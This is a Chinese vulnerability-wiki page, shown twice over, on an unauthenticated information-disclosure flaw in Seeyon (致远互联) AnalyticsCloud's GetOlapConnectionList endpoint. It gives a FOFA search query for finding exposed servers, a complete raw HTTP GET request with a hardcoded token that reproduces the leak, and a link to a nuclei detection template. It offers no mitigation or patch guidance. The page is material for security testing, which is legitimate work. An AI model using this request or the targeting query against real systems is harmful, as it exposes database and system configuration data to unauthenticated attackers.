fofamini-wiki

登录白背景

源码

致远互联-分析云 getolapconnectionlist 存在信息泄露漏洞

一、漏洞简介

AnalyticsCloud 分析云集成了先进的数据分析技术和工具，能够处理来自各种数据源的数据，包括云数据、本地数据、传统数据和大数据等。它提供了从数据收集、整理、分析到应用的全链路解决方案，帮助企业更好地理解和利用数据，从而优化业务流程、提升决策效率。A致远互联-分析云 getolapconnectionlist 存在信息泄露漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

二、影响版本

AnalyticsCloud 分析云

三、资产测绘

fofabody="js/lib/ba.common.js" || body="/bi/portal/manifest.json"
特征

四、漏洞复现

GET /bi/api/SemanticModel/GetOlapConnectionList/?token=e30fe47a-f33e-463e-bc4a-843957ca88dd_263720ea7e397482da220115cae828_1214162142339 HTTP/1.1
Host: 
Range: bytes=0-100
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close

nuclei

AnalyticsCloud_fenxiyun_getolapconnectionlist.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/zi1675bwu39ygg9p

# 致远互联-分析云 getolapconnectionlist 存在信息泄露漏洞

# 一、漏洞简介
AnalyticsCloud 分析云集成了先进的数据分析技术和工具，能够处理来自各种数据源的数据，包括云数据、本地数据、传统数据和大数据等。它提供了从数据收集、整理、分析到应用的全链路解决方案，帮助企业更好地理解和利用数据，从而优化业务流程、提升决策效率。A致远互联-分析云 getolapconnectionlist 存在信息泄露漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

# 二、影响版本
+ AnalyticsCloud 分析云

# 三、资产测绘
+ fofa`body="js/lib/ba.common.js" || body="/bi/portal/manifest.json"`
+ 特征

![1721441814779-df8202b3-53b4-4649-8867-904e6df95377.png](./img/MWD9rafUZXQ4JuBI/1721441814779-df8202b3-53b4-4649-8867-904e6df95377-146889.png)

# 四、漏洞复现
```plain
GET /bi/api/SemanticModel/GetOlapConnectionList/?token=e30fe47a-f33e-463e-bc4a-843957ca88dd_263720ea7e397482da220115cae828_1214162142339 HTTP/1.1
Host: 
Range: bytes=0-100
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
```

![1724653684999-c480df41-f2c5-4639-8f34-efb892c33cdd.png](./img/MWD9rafUZXQ4JuBI/1724653684999-c480df41-f2c5-4639-8f34-efb892c33cdd-577177.png)

### nuclei
[AnalyticsCloud_fenxiyun_getolapconnectionlist.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1730787584876-c27786df-368e-4fe7-b8ca-f4d2619c4fd7.yaml)

![1724656101145-a977312b-3ee2-412e-abe0-8843cec8d229.png](./img/MWD9rafUZXQ4JuBI/1724656101145-a977312b-3ee2-412e-abe0-8843cec8d229-983193.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zi1675bwu39ygg9p>